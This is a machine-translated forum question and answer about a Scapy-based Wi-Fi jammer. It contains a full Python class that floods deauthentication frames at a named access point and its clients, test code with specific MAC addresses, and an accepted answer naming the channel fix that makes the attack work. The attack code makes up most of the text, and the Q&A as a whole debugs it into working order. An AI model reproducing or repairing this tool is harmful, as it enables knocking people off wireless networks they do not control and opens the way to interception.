所以我一直试图让这个Wifi Jammer使用Scapy工作。
我已经按照这个非常简单的教程,这应该足够工作了: https://www.youtube.com/watch?v=NKqG_i6qMJM
这不起作用,虽然我得到了相同的输出。
然后我找到了这个项目: https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py
哪些自动扫描和通道跳跃可以填充一些变量本身。如果我运行它,它的效果很好。
所以我提出了我自己的代码,我认为这一切都可以工作,但不管怎样,就好像没有任何反应,尽管所有输出看起来都很好。
这是我的AirJammer类(无法在此处正确缩进代码,但在我的实际项目中它是正确的):
class AirDeauthenticator(object):
def __init__(self):
self.deauth_running = False
self.running_interface = None
self.deauth_thread = None
self.channel_hopper_thread = None
self.channel_lock = Lock()
self.current_channel = 3
self.targeted_only = False # Flag if we only want to perform targeted deauthentication attacks
self._burst_count = 500 # Number of sequential deuathentication packet bursts to send
self._bssids_to_deauth = [] # MAC addresses of APs, used to send deauthentication packets to broadcast
self._clients_to_deauth = {} # Pairs clients to their connected AP to send targeted deauthentication attacks
def add_bssid(self, bssid):
self._bssids_to_deauth.append(bssid)
def add_client(self, client, bssid):
self._clients_to_deauth[client] = bssid
def set_burst_count(self, count):
self._burst_count = count
def hop_channels(self, interface, hop_interval):
while self.deauth_running:
print self.current_channel
Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
with self.channel_lock:
self.current_channel += 1
if self.current_channel > 11:
self.current_channel = 1
sleep(hop_interval)
def deauthentication_attack(self, interface):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self.targeted_only:
for bssid in self._bssids_to_deauth:
deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet)
for client in self._clients_to_deauth.keys():
bssid = self._clients_to_deauth[client]
deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print "N Packets: {}\n".format(len(packets))
while count >= 0:
for packet in packets:
packet.show()
send(packet, iface = interface, count = 1, inter = 0)
count -= 1
self.deauth_running = False
self.running_interface = None
def start_deauthentication_attack(self, interface, hop_interval=5):
self.running_interface = interface
self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
self.deauth_running = True
self.deauth_thread.start()
self.channel_hopper_thread.start()
这是我的测试代码:
deauthor = AirDeauthenticator()
deauthor.add_bssid('00:04:CA:AC:E9:22')
deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
deauthor.start_deauthentication_attack('wlan1')
输出看起来很好,虽然我从scapy得到这个警告: 。警告:未找到目的地的Mac地址。使用广播。 。警告:更多Mac地址无法找到目的地。使用广播。
但是我在wifijammer.py工具上看到了相同的输出,该工具仍然有效。
在尝试发送这些数据包时,还有什么我需要关注的吗?
我尝试将界面置于监控模式但仍然没有运气。
好的,只要我能够调试它,问题确实存在于该警告消息中。如果我拔掉usb-wifi棒并将其插回去,第一次就不会出现这个错误,如果我重复这个过程,它仍然会出现。
当我使用wifijammer.py工具时,我没有发生这种情况,但我已经反复分析了代码,并且没有找到任何可以避免这种scapy问题的设置机制。
答案 0 :(得分:0)
这里的问题是我正在运行的wifi频道。
要执行此操作,必须将wifi通道设置为与AP相同(客户端也将位于相同的通道上)。
否则,将以目标设备未监听的其他频率发送数据包。